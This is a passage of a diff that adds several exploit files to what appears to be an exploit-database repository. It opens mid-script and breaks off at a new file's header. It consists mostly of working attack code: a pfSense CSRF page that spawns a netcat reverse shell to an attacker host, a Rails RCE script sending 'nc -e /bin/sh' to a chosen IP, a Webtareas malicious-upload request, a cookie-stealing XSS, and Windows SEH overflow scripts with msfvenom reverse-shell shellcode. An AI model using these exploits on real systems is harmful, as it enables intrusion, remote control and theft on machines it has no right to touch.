xhr.setRequestHeader("User-Agent","Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0");
xhr.setRequestHeader("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language","en-US,en;q=0.5");
xhr.setRequestHeader("Accept-Encoding","gzip, deflate");
xhr.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
xhr.setRequestHeader("Referer","http://"+Pandora_IP+"/pandora_console/index.php?sec=gagente&sec2=godmode/agentes/configurar_agente&tab=module&id_agente=2");
xhr.setRequestHeader("Content-Length",payload.length);
xhr.setRequestHeader("Connection","close");
xhr.setRequestHeader("Upgrade-Insecure-Requests","1");
xhr.send(payload);
//----------------end of shell.js-------------------------------//

51
exploits/php/webapps/48709.txt Normal file
View file

@ -0,0 +1,51 @@
# Exploit Title: Webtareas 2.1p - Arbitrary File Upload (Authenticated)
# Author: AppleBois
# Date: 2020-07-10
# Exploit author : AppleBois
# Vendor Hompage:https://sourceforge.net/projects/webtareas/
# Version: 2.1 && 2.1p
# Tested on: Window 10 64 bit environment || XAMPP
# Authenticated User allowed to upload ".exe" and ".shtml" to file uploaded directory
# More information : https://medium.com/@tehwinsam/webtareas-2-1-c8b406c68c2a
POST /Tareas/webtareas/linkedcontent/addfile.php?doc_type=0&doc_type_ex=&doc_id=1&borne15=0&borne16=0 HTTP/1.1
Host: 10.10.10.2:81
Content-Length: 711
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.10.2:81
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHtJ36OtVyQuyaY6y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://10.10.10.2:81/Tareas/webtareas/linkedcontent/addfile.php?doc_type=0&doc_id=1&borne15=0&borne16=0
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: webTareasSID=vqg1lbhf9g5esjrie84dsrjjhg; ASP.NET_SessionId=vbrb31kd3s5hmz3uobg0smck; UserSettings=language=1; dnn_IsMobile=False; .ASPXANONYMOUS=VA9hDh-1Ldg0FPbBfd9HAWSTqKjasYcZMlHQnpPaoR5WQipK7Q_kKnAlAqfWp0WgtO8HXH2_Tsrhfh-Z7137cng_MeEp3aiMPswVEPZc-UOdZQTp0; __RequestVerificationToken_L0ROTg2=Js5PUWl0BiY3kJLdEPU2oEna_UsEFTrNQiGY986uBwWdRyVDxr2ItTPSUBd07QX6rRyfXQ2; USERNAME_CHANGED=; language=en-US; authentication=DNN; .DOTNETNUKE=CC547735526446773F995D833FACDA646745AE4409516EBF345F1AC725F7D7CE7BFC420BF5EFE9FE2AEC92B04C89CCD2E64C34BA4E195D7D8D6EED7892574DB3FF02599F; ICMSSESSION=mgnp26oubn7hfc590q6j5c9o70
Connection: close
------WebKitFormBoundaryHtJ36OtVyQuyaY6y
Content-Disposition: form-data; name="action"
add
------WebKitFormBoundaryHtJ36OtVyQuyaY6y
Content-Disposition: form-data; name="file1"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundaryHtJ36OtVyQuyaY6y
Content-Disposition: form-data; name="attnam1"
a.shtml
------WebKitFormBoundaryHtJ36OtVyQuyaY6y
Content-Disposition: form-data; name="atttmp1"
C:/xampp/htdocs/Tareas/webtareas/files/tmpEDE7.tmp
------WebKitFormBoundaryHtJ36OtVyQuyaY6y
Content-Disposition: form-data; name="c"
------WebKitFormBoundaryHtJ36OtVyQuyaY6y
Content-Disposition: form-data; name="ver"
1.0
------WebKitFormBoundaryHtJ36OtVyQuyaY6y--

40
exploits/php/webapps/48714.txt Normal file
View file

@ -0,0 +1,40 @@
# Exploit Title: pfSense 2.4.4-p3 - Cross-Site Request Forgery
# Date: 2019-09-27
# Exploit Author: ghost_fh
# Vendor Homepage: https://www.pfsense.org/
# Software Link: https://www.pfsense.org/download/index.html?section=downloads
# Version: Till 2.4.4-p3
# Tested on: freebsd
# CVE : CVE-2019-16667
# Vulnerability Description :- The pfsense firewall is vulnerable to RCE
# chained with CSRF as it uses `csrf magic` library since it allows to tamper
# the CSRF token values submitted when processing the form requests. Due to
# this flaw, an attacker can exploit this vulnerability by crafting new page
# that contains attacker's controlled input such as a "reverse shell" (eg:
# `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attackerip port
# >/tmp/f`token value) in the form and entice the victims to click
# on the crafted link via social engineering methods. Once the victim clicks
# on the link (try again button in this case), the attacker can take the
# lateral control of the victim's machine and malicious actions can be
# performed on the victim's behalf.
<!DOCTYPE html>
<html>
<body onload="document.createElement('form').submit.call(document.getElementById('myForm'))">
<form id="myForm" action="https://pfsense_ip/diag_command.php" method="POST">
<input type=hidden name="txtCommand" value="rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|
nc attacker_ip attacker_port >/tmp/f">
<input type=hidden name="txtRecallBuffer" value="rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i
2>&1|nc attacker_ip attacker_port >/tmp/f">
<input type=hidden name="dlPath" value="">
<input type=hidden name="txtPHPCommand" value="">
<input type="hidden" name="submit" value="EXEC">
</form>
</body>
</html>
# Create a malicious page containing the above values and once user clicks on malicious link,
# he will be redirected to https://pfsense_ip/diag_command.php page.
# Victim will be greeted with the "Try again" button.
# Once victim clicks on the "Try again" button you will be greeted with reverse shell of the victim.

40
exploits/php/webapps/48715.txt Normal file
View file

@ -0,0 +1,40 @@
# Exploit Title: Virtual Airlines Manager 2.6.2 - Persistent Cross-Site Scripting
# Google Dork: inurl:"/vam/index_vam_op.php"
# Date: 2020-06-29
# Exploit Author: Peter Blue
# Vendor Homepage: https://virtualairlinesmanager.net
# Software Link: https://virtualairlinesmanager.net
# Version: 2.6.2
# Tested on: Linux (Fedora 23), MariaDB, PHP 5.6.29, Apache
# CVE: N/A
This project looks nice but lacks a lot of input filtering.
This example allows a logged-in user to inject JavaScript code, and this
case steal a session ID, but other exploits could be injected.
This exploit example assumes you have installed VAM 2.6.2 on a local server.
Steps :-
1. Log on. There is an admin account: Callsign: vam100, Password: 123456
2. Click "Pilot Actions"
3. Click "Internal Mail"
4. Click New Message
5. In "Subject" enter XSS <script>alert(document.cookie);//<</script>
6. in "Message" type anything
7. Click "Send"
8. When the page refreshes your PHP session ID will show in an alert box
It is also quite possible to inject raw HTML into the subject.
A bit of Google Dorking revealed many websites running this, some were
dead, some deserted and a few were live.

32
exploits/ruby/webapps/48716.rb Executable file
View file

@ -0,0 +1,32 @@
# Exploit Title: Rails 5.0.1 - Remote Code Execution
# Date: 2020-07-19
# Exploit Author: Lucas Amorim
# Vendor Homepage: www.rubyonrails.org
# Software Link: www.rubyonrails.org
# Version: Rails < 5.0.1
# Tested on: Linux/OSx
# CVE : CVE-2020-8163
# More information: https://github.com/sh286/CVE-2020-8163
#!/usr/bin/ruby
require 'net/http'
def header
puts "[*] - CVE-2020-8163 - Remote code execution of user-provided local names in Rails < 5.0.1\n"
puts "[*] - Author: Lucas Amorim lucas@lucasamorim.ca"
puts "[*] - Usage: \n"
puts "ruby exploit.rb <url> <ip> <port>"
end
if ARGV.length < 3
header
exit(-1)
end
url = ARGV[0]
ip = ARGV[1]
port = ARGV[2]
puts "[*] Sending payload to #{url}"
uri = URI(url+"?system(%27nc+-e+/bin/sh+#{ip}+#{port}%27)%3ba%23")
Net::HTTP.get(uri)

33
exploits/windows/dos/48697.py Executable file
View file

@ -0,0 +1,33 @@
# Exploit Title: Calavera UpLoader 3.5 - 'FTP Logi' Denial of Service (PoC + SEH Overwrite)
# Date: 2020-07-20
# Author: Felipe Winsnes
# Software Link: https://www.exploit-db.com/apps/463c9e7fe9a39888d3c01bc9ad756bba-UpSetup.exe
# Version: 3.5
# Tested on: Windows 7 (x86)
# Blog: https://whitecr0wz.github.io/
# Sadly enough, this vulnerability is not exploitable as there are no friendly PPR addresses available and
# yet the vulnerability is triggered with additional padding == can't use addresses with null values.
# Proof of Concept:
# 1.- Run the python script, it will create a new file "poc.txt".
# 2.- Copy the content of the new file 'poc.txt' to clipboard.
# 3.- Open the Application.
# 4.- Click on "Settings".
# 4.- Paste contents of the generated file into the parameters "FTP Address", "Username" and Password". Furthermore, check the box with the statement "Check to save password in preferences".
# 5.- Crashed.
# 6.- As uploadpref.dat is generated, every time the application opens it will crash, with the SEH values being overwritten. In order to stop this behavior simply delete the file.
# If the contents are only pasted into "Password", the application will only crash once without creating uploadpref.dat.
buffer = "A" * 477 + "BBBB" + "CCCC" + "\xff" * 2000
try:
f = open ("poc.txt", "w")
f.write(buffer)
f.close()
print "[+] The file has been created successfully!"
except:
print "[!] There has been an error while creating the file."

66
exploits/windows/local/48687.py Executable file
View file

@ -0,0 +1,66 @@
# Exploit Title: Nidesoft DVD Ripper 5.2.18 - Local Buffer Overflow (SEH)
# Date: 2020-07-26
# Author: Felipe Winsnes
# Software Link: https://nidesoft-dvd-ripper.softonic.com/
# Version: 5.2.18
# Tested on: Windows 7 (x86)
# Blog: https://whitecr0wz.github.io/
# Proof of Concept:
# 1.- Run the python script, it will create the file "poc.txt".
# 2.- Copy the content of the new file "poc.txt" to clipboard
# 3.- Open the application.
# 4.- Paste the clipboard into the "License Code" parameter within registration.
# 5.- Profit.
import struct
# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed EXITFUNC=thread -b "\x00\x0a\x0d"
# Payload size: 448 bytes
buf = b""
buf += b"\x89\xe5\xda\xda\xd9\x75\xf4\x5f\x57\x59\x49\x49\x49"
buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x6d\x38\x4c"
buf += b"\x42\x33\x30\x73\x30\x37\x70\x55\x30\x6c\x49\x6b\x55"
buf += b"\x35\x61\x49\x50\x32\x44\x6e\x6b\x42\x70\x66\x50\x6c"
buf += b"\x4b\x56\x32\x74\x4c\x6c\x4b\x42\x72\x75\x44\x6c\x4b"
buf += b"\x54\x32\x31\x38\x74\x4f\x58\x37\x51\x5a\x31\x36\x55"
buf += b"\x61\x6b\x4f\x4c\x6c\x77\x4c\x33\x51\x53\x4c\x35\x52"
buf += b"\x76\x4c\x51\x30\x4f\x31\x78\x4f\x74\x4d\x67\x71\x38"
buf += b"\x47\x68\x62\x4b\x42\x46\x32\x30\x57\x6c\x4b\x71\x42"
buf += b"\x62\x30\x6e\x6b\x61\x5a\x57\x4c\x6c\x4b\x70\x4c\x54"
buf += b"\x51\x63\x48\x49\x73\x63\x78\x43\x31\x4e\x31\x43\x61"
buf += b"\x6c\x4b\x50\x59\x31\x30\x63\x31\x59\x43\x4e\x6b\x77"
buf += b"\x39\x44\x58\x79\x73\x77\x4a\x62\x69\x4c\x4b\x66\x54"
buf += b"\x6c\x4b\x47\x71\x78\x56\x70\x31\x39\x6f\x4c\x6c\x6f"
buf += b"\x31\x58\x4f\x34\x4d\x46\x61\x4b\x77\x46\x58\x4d\x30"
buf += b"\x53\x45\x5a\x56\x45\x53\x73\x4d\x39\x68\x67\x4b\x73"
buf += b"\x4d\x51\x34\x74\x35\x79\x74\x53\x68\x6e\x6b\x33\x68"
buf += b"\x67\x54\x47\x71\x69\x43\x71\x76\x4e\x6b\x74\x4c\x30"
buf += b"\x4b\x4c\x4b\x73\x68\x47\x6c\x67\x71\x48\x53\x4c\x4b"
buf += b"\x54\x44\x4c\x4b\x36\x61\x68\x50\x6b\x39\x61\x54\x77"
buf += b"\x54\x76\x44\x63\x6b\x63\x6b\x31\x71\x32\x79\x72\x7a"
buf += b"\x52\x71\x39\x6f\x4b\x50\x31\x4f\x61\x4f\x73\x6a\x6e"
buf += b"\x6b\x65\x42\x48\x6b\x6e\x6d\x61\x4d\x43\x5a\x45\x51"
buf += b"\x4c\x4d\x6e\x65\x6f\x42\x57\x70\x67\x70\x43\x30\x30"
buf += b"\x50\x45\x38\x35\x61\x6c\x4b\x72\x4f\x6f\x77\x39\x6f"
buf += b"\x79\x45\x6f\x4b\x6b\x50\x65\x4d\x67\x5a\x74\x4a\x65"
buf += b"\x38\x6d\x76\x4f\x65\x6d\x6d\x4f\x6d\x49\x6f\x39\x45"
buf += b"\x67\x4c\x67\x76\x73\x4c\x47\x7a\x4f\x70\x4b\x4b\x69"
buf += b"\x70\x32\x55\x47\x75\x6d\x6b\x30\x47\x44\x53\x63\x42"
buf += b"\x62\x4f\x42\x4a\x75\x50\x43\x63\x6b\x4f\x4e\x35\x71"
buf += b"\x73\x31\x71\x30\x6c\x55\x33\x54\x6e\x62\x45\x74\x38"
buf += b"\x53\x55\x65\x50\x41\x41"
nseh = "\xEB\x11\x41\x41"
seh = struct.pack("<I", 0x6678336D) # 0x6678336d : pop ebx # pop esi # ret | asciiprint,ascii,alphanum,lowernum {PAGE_EXECUTE_WRITECOPY} [avcodec.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\Nidesoft Studio\Nidesoft DVD Ripper 5\avcodec.dll)
buffer = "A" * 6008 + nseh + seh + "A" * 11 + buf + "\xff" * 200
f = open ("poc.txt", "w")
f.write(buffer)
f.close()

98
exploits/windows/local/48688.py Executable file
View file

@ -0,0 +1,98 @@
# Exploit Title: Frigate Professional 3.36.0.9 - 'Pack File' Buffer Overflow (SEH Egghunter)
# Date: 2020-07-24
# Exploit Author: MasterVlad
# Vendor Homepage: http://www.frigate3.com/
# Software Link: http://www.frigate3.com/download/frigate3_pro.exe
# Version: 3.36.0.9
# Vulnerability Type: Local Buffer Overflow
# Tested on: Windows 7 32-bit
# Proof of Concept:
# 1. Run the python script
# 2. Open exploit.txt and copy the content to clipboard
# 3. Open Frigate3.exe and go to File -> Pack
# 4. Paste the clipboard into the "Archive To" field and click on Ok button
#!/usr/bin/python
egg = "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x54\x58\x66\x05\x44\x17\x50\x5c"
egg += "\x25\x4A\x50\x5c\x25\x4A"
egg += "\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x01\x7F\x01\x2D\x0B\x01\x7F\x01\x2D\x01\x16\x02\x15\x50"
egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x7F\x01\x01\x2D\x50\x0B\x14\x4F\x50"
egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x7F\x01\x01\x2D\x51\x29\x73\x04\x50"
egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x01\x2C\x50\x2D\x10\x46\x7F\x7F\x50"
egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x45\x7B\x26\x0C\x2D\x7F\x7F\x7F\x7F\x50"
egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x28\x01\x52\x2D\x7F\x7F\x31\x7F\x50"
egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x72\x4D\x3D\x16\x2D\x7F\x70\x70\x7F\x50"
egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x1A\x7B\x01\x7F\x2D\x7F\x01\x33\x7F\x2D\x01\x02\x01\x02\x50"
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.164.129 LPORT=443 -b "\x00\x0a\x0d\x13\x14\x15\x16" -f py -e x86/alpha_mixed BufferRegister=EDI
buf = ""
buf += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
buf += "\x69\x6c\x68\x68\x6e\x62\x55\x50\x45\x50\x43\x30\x63"
buf += "\x50\x6e\x69\x6a\x45\x45\x61\x59\x50\x55\x34\x4e\x6b"
buf += "\x52\x70\x76\x50\x6c\x4b\x73\x62\x76\x6c\x6c\x4b\x70"
buf += "\x52\x42\x34\x6e\x6b\x43\x42\x75\x78\x64\x4f\x48\x37"
buf += "\x42\x6a\x71\x36\x65\x61\x39\x6f\x6e\x4c\x67\x4c\x53"
buf += "\x51\x71\x6c\x76\x62\x56\x4c\x67\x50\x79\x51\x78\x4f"
buf += "\x36\x6d\x43\x31\x79\x57\x6d\x32\x4c\x32\x72\x72\x66"
buf += "\x37\x6e\x6b\x72\x72\x56\x70\x6e\x6b\x32\x6a\x75\x6c"
buf += "\x4e\x6b\x62\x6c\x37\x61\x33\x48\x69\x73\x43\x78\x56"
buf += "\x61\x38\x51\x50\x51\x4e\x6b\x71\x49\x31\x30\x57\x71"
buf += "\x4b\x63\x6e\x6b\x71\x59\x37\x68\x68\x63\x57\x4a\x50"
buf += "\x49\x6e\x6b\x75\x64\x4e\x6b\x43\x31\x68\x56\x35\x61"
buf += "\x59\x6f\x6e\x4c\x69\x51\x48\x4f\x36\x6d\x55\x51\x6f"
buf += "\x37\x65\x68\x4b\x50\x70\x75\x69\x66\x73\x33\x51\x6d"
buf += "\x6a\x58\x35\x6b\x63\x4d\x76\x44\x54\x35\x4d\x34\x43"
buf += "\x68\x4e\x6b\x70\x58\x37\x54\x76\x61\x59\x43\x62\x46"
buf += "\x6c\x4b\x54\x4c\x72\x6b\x6e\x6b\x51\x48\x35\x4c\x35"
buf += "\x51\x79\x43\x6c\x4b\x43\x34\x6c\x4b\x63\x31\x68\x50"
buf += "\x6d\x59\x57\x34\x76\x44\x67\x54\x31\x4b\x51\x4b\x33"
buf += "\x51\x71\x49\x72\x7a\x50\x51\x79\x6f\x69\x70\x43\x6f"
buf += "\x63\x6f\x33\x6a\x6e\x6b\x65\x42\x48\x6b\x6c\x4d\x31"
buf += "\x4d\x50\x68\x45\x63\x55\x62\x73\x30\x75\x50\x30\x68"
buf += "\x44\x37\x73\x43\x45\x62\x43\x6f\x43\x64\x45\x38\x42"
buf += "\x6c\x53\x47\x46\x46\x63\x37\x69\x6f\x69\x45\x48\x38"
buf += "\x4a\x30\x45\x51\x57\x70\x55\x50\x67\x59\x49\x54\x70"
buf += "\x54\x32\x70\x42\x48\x44\x69\x6d\x50\x70\x6b\x67\x70"
buf += "\x79\x6f\x6b\x65\x66\x30\x30\x50\x70\x50\x32\x70\x43"
buf += "\x70\x72\x70\x67\x30\x62\x70\x75\x38\x58\x6a\x36\x6f"
buf += "\x49\x4f\x79\x70\x69\x6f\x48\x55\x4c\x57\x53\x5a\x56"
buf += "\x65\x52\x48\x79\x50\x79\x38\x4f\x54\x6d\x51\x52\x48"
buf += "\x43\x32\x53\x30\x63\x31\x4d\x6b\x6d\x59\x38\x66\x30"
buf += "\x6a\x66\x70\x43\x66\x53\x67\x61\x78\x5a\x39\x6e\x45"
buf += "\x72\x54\x33\x51\x59\x6f\x58\x55\x4b\x35\x59\x50\x44"
buf += "\x34\x66\x6c\x69\x6f\x32\x6e\x65\x58\x31\x65\x4a\x4c"
buf += "\x50\x68\x6a\x50\x68\x35\x39\x32\x73\x66\x49\x6f\x58"
buf += "\x55\x62\x48\x42\x43\x32\x4d\x73\x54\x57\x70\x6b\x39"
buf += "\x39\x73\x66\x37\x76\x37\x42\x77\x55\x61\x49\x66\x50"
buf += "\x6a\x54\x52\x73\x69\x70\x56\x78\x62\x49\x6d\x32\x46"
buf += "\x49\x57\x57\x34\x51\x34\x65\x6c\x53\x31\x65\x51\x4c"
buf += "\x4d\x52\x64\x61\x34\x32\x30\x6b\x76\x47\x70\x72\x64"
buf += "\x51\x44\x42\x70\x42\x76\x46\x36\x43\x66\x77\x36\x42"
buf += "\x76\x62\x6e\x32\x76\x71\x46\x70\x53\x46\x36\x33\x58"
buf += "\x61\x69\x58\x4c\x35\x6f\x6b\x36\x6b\x4f\x4b\x65\x4d"
buf += "\x59\x49\x70\x30\x4e\x31\x46\x33\x76\x6b\x4f\x66\x50"
buf += "\x71\x78\x43\x38\x4b\x37\x37\x6d\x73\x50\x6b\x4f\x4b"
buf += "\x65\x6f\x4b\x48\x70\x6c\x75\x4f\x52\x72\x76\x73\x58"
buf += "\x49\x36\x6e\x75\x4d\x6d\x4d\x4d\x59\x6f\x39\x45\x55"
buf += "\x6c\x63\x36\x53\x4c\x66\x6a\x4d\x50\x79\x6b\x6b\x50"
buf += "\x64\x35\x46\x65\x6f\x4b\x72\x67\x45\x43\x50\x72\x70"
buf += "\x6f\x32\x4a\x65\x50\x51\x43\x49\x6f\x59\x45\x41\x41"
exploit = "A"*4112
# 0x40012623 - pop pop ret rtl60.bpl
exploit += "\x74\x06\x75\x04"
exploit += "\x23\x26\x01\x40"
exploit += egg
exploit += "C"*(5000-4120-len(egg))
exploit += "T00WT00W"
exploit += buf
f = open("exploit.txt", "w")
f.write(exploit)
f.close()

100
exploits/windows/local/48689.py Executable file
View file

@ -0,0 +1,100 @@
# Exploit Title: DiskBoss 7.7.14 - 'Reports and Data Directory' Buffer Overflow (SEH Egghunter)
# Date: 2020-07-26
# Exploit Author: MasterVlad
# Vendor Homepage: https://www.diskboss.com/
# Software Link: https://github.com/x00x00x00x00/diskboss_7.7.14/raw/master/diskboss_setup_v7.7.14.exe
# Version: 7.7.14
# Vulnerability Type: Local Buffer Overflow
# Tested on: Windows 7 32-bit
# Proof of Concept:
# 1. Run the python script
# 2. Open exploit.txt and copy the content to clipboard
# 3. Open diskbsg.exe and go to Tools -> DiskBoss Options
# 4. Go to Advanced and paste the clipboard into the "Reports and Data Directory" field
# 5. Click on Save button
#!/usr/bin/python
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.164.129 LPORT=443 -b "\x00\x0a\x0d\x13\x14\x15\x16" -f py -e x86/alpha_mixed BufferRegister=EDI
buf = ""
buf += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
buf += "\x69\x6c\x68\x68\x6e\x62\x55\x50\x45\x50\x43\x30\x63"
buf += "\x50\x6e\x69\x6a\x45\x45\x61\x59\x50\x55\x34\x4e\x6b"
buf += "\x52\x70\x76\x50\x6c\x4b\x73\x62\x76\x6c\x6c\x4b\x70"
buf += "\x52\x42\x34\x6e\x6b\x43\x42\x75\x78\x64\x4f\x48\x37"
buf += "\x42\x6a\x71\x36\x65\x61\x39\x6f\x6e\x4c\x67\x4c\x53"
buf += "\x51\x71\x6c\x76\x62\x56\x4c\x67\x50\x79\x51\x78\x4f"
buf += "\x36\x6d\x43\x31\x79\x57\x6d\x32\x4c\x32\x72\x72\x66"
buf += "\x37\x6e\x6b\x72\x72\x56\x70\x6e\x6b\x32\x6a\x75\x6c"
buf += "\x4e\x6b\x62\x6c\x37\x61\x33\x48\x69\x73\x43\x78\x56"
buf += "\x61\x38\x51\x50\x51\x4e\x6b\x71\x49\x31\x30\x57\x71"
buf += "\x4b\x63\x6e\x6b\x71\x59\x37\x68\x68\x63\x57\x4a\x50"
buf += "\x49\x6e\x6b\x75\x64\x4e\x6b\x43\x31\x68\x56\x35\x61"
buf += "\x59\x6f\x6e\x4c\x69\x51\x48\x4f\x36\x6d\x55\x51\x6f"
buf += "\x37\x65\x68\x4b\x50\x70\x75\x69\x66\x73\x33\x51\x6d"
buf += "\x6a\x58\x35\x6b\x63\x4d\x76\x44\x54\x35\x4d\x34\x43"
buf += "\x68\x4e\x6b\x70\x58\x37\x54\x76\x61\x59\x43\x62\x46"
buf += "\x6c\x4b\x54\x4c\x72\x6b\x6e\x6b\x51\x48\x35\x4c\x35"
buf += "\x51\x79\x43\x6c\x4b\x43\x34\x6c\x4b\x63\x31\x68\x50"
buf += "\x6d\x59\x57\x34\x76\x44\x67\x54\x31\x4b\x51\x4b\x33"
buf += "\x51\x71\x49\x72\x7a\x50\x51\x79\x6f\x69\x70\x43\x6f"
buf += "\x63\x6f\x33\x6a\x6e\x6b\x65\x42\x48\x6b\x6c\x4d\x31"
buf += "\x4d\x50\x68\x45\x63\x55\x62\x73\x30\x75\x50\x30\x68"
buf += "\x44\x37\x73\x43\x45\x62\x43\x6f\x43\x64\x45\x38\x42"
buf += "\x6c\x53\x47\x46\x46\x63\x37\x69\x6f\x69\x45\x48\x38"
buf += "\x4a\x30\x45\x51\x57\x70\x55\x50\x67\x59\x49\x54\x70"
buf += "\x54\x32\x70\x42\x48\x44\x69\x6d\x50\x70\x6b\x67\x70"
buf += "\x79\x6f\x6b\x65\x66\x30\x30\x50\x70\x50\x32\x70\x43"
buf += "\x70\x72\x70\x67\x30\x62\x70\x75\x38\x58\x6a\x36\x6f"
buf += "\x49\x4f\x79\x70\x69\x6f\x48\x55\x4c\x57\x53\x5a\x56"
buf += "\x65\x52\x48\x79\x50\x79\x38\x4f\x54\x6d\x51\x52\x48"
buf += "\x43\x32\x53\x30\x63\x31\x4d\x6b\x6d\x59\x38\x66\x30"
buf += "\x6a\x66\x70\x43\x66\x53\x67\x61\x78\x5a\x39\x6e\x45"
buf += "\x72\x54\x33\x51\x59\x6f\x58\x55\x4b\x35\x59\x50\x44"
buf += "\x34\x66\x6c\x69\x6f\x32\x6e\x65\x58\x31\x65\x4a\x4c"
buf += "\x50\x68\x6a\x50\x68\x35\x39\x32\x73\x66\x49\x6f\x58"
buf += "\x55\x62\x48\x42\x43\x32\x4d\x73\x54\x57\x70\x6b\x39"
buf += "\x39\x73\x66\x37\x76\x37\x42\x77\x55\x61\x49\x66\x50"
buf += "\x6a\x54\x52\x73\x69\x70\x56\x78\x62\x49\x6d\x32\x46"
buf += "\x49\x57\x57\x34\x51\x34\x65\x6c\x53\x31\x65\x51\x4c"
buf += "\x4d\x52\x64\x61\x34\x32\x30\x6b\x76\x47\x70\x72\x64"
buf += "\x51\x44\x42\x70\x42\x76\x46\x36\x43\x66\x77\x36\x42"
buf += "\x76\x62\x6e\x32\x76\x71\x46\x70\x53\x46\x36\x33\x58"
buf += "\x61\x69\x58\x4c\x35\x6f\x6b\x36\x6b\x4f\x4b\x65\x4d"
buf += "\x59\x49\x70\x30\x4e\x31\x46\x33\x76\x6b\x4f\x66\x50"
buf += "\x71\x78\x43\x38\x4b\x37\x37\x6d\x73\x50\x6b\x4f\x4b"
buf += "\x65\x6f\x4b\x48\x70\x6c\x75\x4f\x52\x72\x76\x73\x58"
buf += "\x49\x36\x6e\x75\x4d\x6d\x4d\x4d\x59\x6f\x39\x45\x55"
buf += "\x6c\x63\x36\x53\x4c\x66\x6a\x4d\x50\x79\x6b\x6b\x50"
buf += "\x64\x35\x46\x65\x6f\x4b\x72\x67\x45\x43\x50\x72\x70"
buf += "\x6f\x32\x4a\x65\x50\x51\x43\x49\x6f\x59\x45\x41\x41"
egg = "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x54\x58\x66\x05\x44\x17\x50\x5c\x25\x4A"
egg += "\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x01\x7F\x01\x2D\x0B\x01\x7F\x01\x2D\x01\x16\x02\x15\x50"
egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x7F\x01\x01\x2D\x50\x0B\x14\x4F\x50"
egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x7F\x01\x01\x2D\x51\x29\x73\x04\x50"
egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x01\x2C\x50\x2D\x10\x46\x7F\x7F\x50"
egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x45\x7B\x26\x0C\x2D\x7F\x7F\x7F\x7F\x50"
egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x28\x01\x52\x2D\x7F\x7F\x31\x7F\x50"
egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x72\x4D\x3D\x16\x2D\x7F\x70\x70\x7F\x50"
egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x1A\x7B\x01\x7F\x2D\x7F\x01\x33\x7F\x2D\x01\x02\x01\x02\x50"
exploit = "A"*4096
# 0x67031912 - pop pop ret
exploit += "\x74\x06\x75\x04"
exploit += "\x12\x19\x03\x67"
exploit += egg
exploit += "C"*(5000-4104)
exploit += "T00WT00W"
exploit += buf
f = open("exploit.txt", "w")
f.write(exploit)
f.close()

102
exploits/windows/local/48691.py Executable file
View file

@ -0,0 +1,102 @@
# Exploit Title: Socusoft Photo to Video Converter Professional 8.07 - 'Output Folder' Buffer Overflow (SEH Egghunter)
# Date: 2020-07-23
# Exploit Author: MasterVlad
# Vendor Homepage: http://www.dvd-photo-slideshow.com/photo-to-video-converter.html
# Software Link: https://www.exploit-db.com/apps/ea1720441edd5990a9d0d1ed564a507e-photo-to-video-pro.exe
# Version: 8.07
# Vulnerability Type: Local Buffer Overflow
# Tested on: Windows 10 x64
# Proof of Concept:
